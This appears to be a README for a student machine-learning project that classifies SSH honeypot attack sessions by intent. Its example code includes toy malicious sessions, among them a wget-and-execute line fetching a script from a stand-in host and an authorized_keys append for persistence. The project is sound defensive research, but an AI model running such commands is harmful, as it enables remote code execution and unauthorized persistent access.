Table of Contents
• Overview
• Dataset
• Project Report
• Project Structure
• Tools and Technologies
• How to Run the Project
• Detailed Documentation
  • Data Directory
  • Notebooks Directory
  • Results Directory
  • Scripts Directory
  • Tests Directory
• Authors
• License
• Acknowledgments
This project is part of the Machine Learning for Networking course at Politecnico di Torino. It focuses on analyzing SSH shell attack sessions recorded from honeypot deployments to classify attacker intents and explore underlying patterns.
- Original Project Repository: ML4Net/SSH-Shell-Attacks
- Original Report Repository: ML4Net/latex-report
Navigation Tip: This README provides a general overview of the project. For detailed documentation, check the specific README files in each directory (see Table of Contents above). Each subdirectory contains in-depth information about its specific components.
Quick Links:
- For data structure and preprocessing: Data Documentation
- For analysis notebooks: Notebooks Documentation
- For implementation details: Scripts Documentation
- Classification: Automatically identify and assign attacker intents (e.g., Persistence, Discovery) to each SSH attack session.
- Clustering: Group similar attack sessions to uncover attack patterns and fine-grained categories.
- Language Models: Explore advanced NLP techniques like BERT and Doc2Vec for improved classification performance.
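To make the classification objective concrete, here is a minimal sketch using scikit-learn, which is listed among the project's tools. It treats each session as text, builds TF-IDF features, and fits one binary classifier per intent. The sample sessions, their labels, the token pattern, the multi-label setup, and the choice of logistic regression are all illustrative assumptions, not the project's actual pipeline or data.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.multiclass import OneVsRestClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MultiLabelBinarizer

# Toy sessions and labels, invented for illustration only.
sessions = [
    "cat /proc/cpuinfo ; uname -a",
    "echo key >> ~/.ssh/authorized_keys",
    "uname -a ; echo key >> ~/.ssh/authorized_keys",
    "wget http://example.com/x.sh ; sh x.sh",
]
labels = [
    {"Discovery"},
    {"Persistence"},
    {"Discovery", "Persistence"},
    {"Execution"},
]

# Turn each set of intents into a row of 0/1 indicators (one column per intent).
binarizer = MultiLabelBinarizer()
y = binarizer.fit_transform(labels)

# Split on whitespace and shell separators (assumed tokenization),
# then train one logistic-regression classifier per intent.
model = make_pipeline(
    TfidfVectorizer(token_pattern=r"[^\s;|&]+"),
    OneVsRestClassifier(LogisticRegression(max_iter=1000)),
)
model.fit(sessions, y)

# Predict the intents of an unseen session and map them back to names.
predicted = model.predict(["uname -a"])
predicted_intents = binarizer.inverse_transform(predicted)
```

With only four toy sessions the predictions themselves are not meaningful; the point is the shape of the pipeline, which can be swapped for any other vectorizer or estimator.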
The dataset consists of approximately 230,000 Unix shell attack sessions recorded from honeypots. It includes:
- Session Commands: Malicious commands executed in an SSH session.
- Timestamps: The exact time each attack started.
- Labels: Pre-assigned intents based on the MITRE ATT&CK framework.
The dataset uses 7 main intent classes:
- Persistence
- Discovery
- Defense Evasion
- Execution
- Impact
- Other (Miscellaneous intents)
- Harmless (Non-malicious commands)
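A session record as described above can be modeled in a few lines of Python. This is only a sketch: the class name `AttackSession`, its field names, and the sample records are hypothetical, and it assumes that a session may carry more than one intent.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

# The seven intent classes listed above.
INTENT_CLASSES = frozenset({
    "Persistence", "Discovery", "Defense Evasion",
    "Execution", "Impact", "Other", "Harmless",
})


@dataclass(frozen=True)
class AttackSession:
    """One honeypot session; field names are hypothetical."""
    commands: str          # full command string of the session
    started_at: datetime   # time the attack started
    intents: frozenset     # one or more intent labels

    def __post_init__(self):
        # Reject labels that are not among the seven known classes.
        unknown = set(self.intents) - INTENT_CLASSES
        if unknown:
            raise ValueError(f"unknown intents: {sorted(unknown)}")


def intent_counts(sessions):
    """Count how many sessions carry each intent."""
    return Counter(intent for s in sessions for intent in s.intents)


# Invented sample records, not taken from the dataset.
sample = [
    AttackSession("uname -a", datetime(2020, 1, 1, 12, 0),
                  frozenset({"Discovery"})),
    AttackSession("echo key >> ~/.ssh/authorized_keys ; uname -a",
                  datetime(2020, 1, 1, 12, 5),
                  frozenset({"Persistence", "Discovery"})),
]
counts = intent_counts(sample)
```

Validating labels at construction time keeps typos in intent names from silently creating an eighth class during analysis.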
The project report is a comprehensive document detailing the methodologies, experiments, and findings of the SSH Shell Attacks project.
- Format: PDF
- Template: ACM format single column (acmlarge)
The report is named SSH-Shell-Attacks-report.pdf and can be found in the root directory of the repository.
An appendix with extra plots and additional information, SSH-Shell-Attacks-appendix.pdf, is also in the root directory. It is a PDF that uses the same ACM single-column template.
The LaTeX source of the report is in the latex-report repository.
SSH-Shell-Attacks/
│
├── data/ # Dataset and related resources
│ ├── raw/ # Original dataset files (e.g., ssh_attacks.parquet)
│ └── processed/ # Pre-processed and feature-engineered files
│
├── notebooks/ # Jupyter notebooks
│
├── scripts/ # Python scripts for algorithms and utilities
│
├── results/ # Outputs from the models and analysis
│ ├── figures/ # Plots and visualizations
│ ├── models/ # Saved models (e.g., .pkl, .h5)
│ └── metrics/ # Evaluation metrics and reports
│
├── README.md # High-level overview of the project
├── SSH-Shell-Attacks-report.pdf # Report of the project
├── SSH-Shell-Attacks-appendix.pdf # Appendix of the report
├── requirements.txt # Python dependencies
├── .gitignore # Ignore unnecessary files for versioning
└── LICENSE # Licensing information (optional)
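The layout above can be checked programmatically after cloning. The helper below is a hypothetical sketch, not a script that ships with the repository; it only tests for the directories and files named in the tree.

```python
from pathlib import Path

# Directories and files taken from the tree above.
EXPECTED_ENTRIES = (
    "data/raw",
    "data/processed",
    "notebooks",
    "scripts",
    "results/figures",
    "results/models",
    "results/metrics",
    "README.md",
    "requirements.txt",
)


def missing_entries(root):
    """Return the expected entries that do not exist under `root`."""
    root = Path(root)
    return [entry for entry in EXPECTED_ENTRIES if not (root / entry).exists()]


if __name__ == "__main__":
    # Run from the repository root to list anything that is absent.
    for entry in missing_entries("."):
        print(f"missing: {entry}")
```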
- Programming Language: Python
- Libraries:
  - Data Processing: pandas, numpy, pyarrow
  - Visualization: matplotlib, seaborn
  - Machine Learning: scikit-learn
  - Clustering: scikit-learn, wordcloud
  - Language Models: scikit-learn, transformers, torch
1. Clone the Repository:
   git clone https://github.com/ML4Net/SSH-Shell-Attacks.git
   cd SSH-Shell-Attacks
2. Install Dependencies:
   pip install -r requirements.txt
3. Execute the Notebooks: Open the relevant notebook for each section and follow the instructions to:
   - Load the dataset.
   - Perform data exploration.
   - Train and evaluate machine learning models.
   Notebooks:
   - section0_data_preprocessing_and_cleaning.ipynb
   - section1_data_exploration_and_preprocessing.ipynb
   - section2_supervised_learning_classification.ipynb
   - section3_unsupervised_learning_clustering.ipynb
   - section4_language_model_exploration.ipynb
4. Explore Scripts: Run modular scripts in the scripts/ directory for specific tasks like preprocessing or model training.
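After installing the dependencies, a quick way to confirm the environment is ready is to check that each library can be found. The sketch below assumes the module list matches the libraries named in this README (the actual contents of requirements.txt may differ); the helper name `missing_modules` is hypothetical.

```python
from importlib.util import find_spec

# Import names for the libraries named in this README;
# note that scikit-learn is imported as `sklearn`.
REQUIRED_MODULES = (
    "pandas", "numpy", "pyarrow", "matplotlib", "seaborn",
    "sklearn", "wordcloud", "transformers", "torch",
)


def missing_modules(modules=REQUIRED_MODULES):
    """Return the top-level modules that cannot be found in this environment."""
    return [name for name in modules if find_spec(name) is None]


if __name__ == "__main__":
    missing = missing_modules()
    if missing:
        print(f"missing: {', '.join(missing)}")
    else:
        print("all dependencies found")
```

Using `find_spec` locates each package without importing it, so the check stays fast even for heavy libraries such as torch.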
- Andrea Botticella
- Elia Innocenti
- Renato Mignone
- Simone Romano
This project is licensed under the MIT License - see the LICENSE file for details.
- Luca Vassio: the professor supervising our work and the primary point of reference for the project.
- Matteo Boffa: the creator and organizer of this project.
- Team Members: Andrea Botticella, Elia Innocenti, Renato Mignone, and Simone Romano.
Please cite this project if you copy it, draw inspiration from it, or reuse any of its material.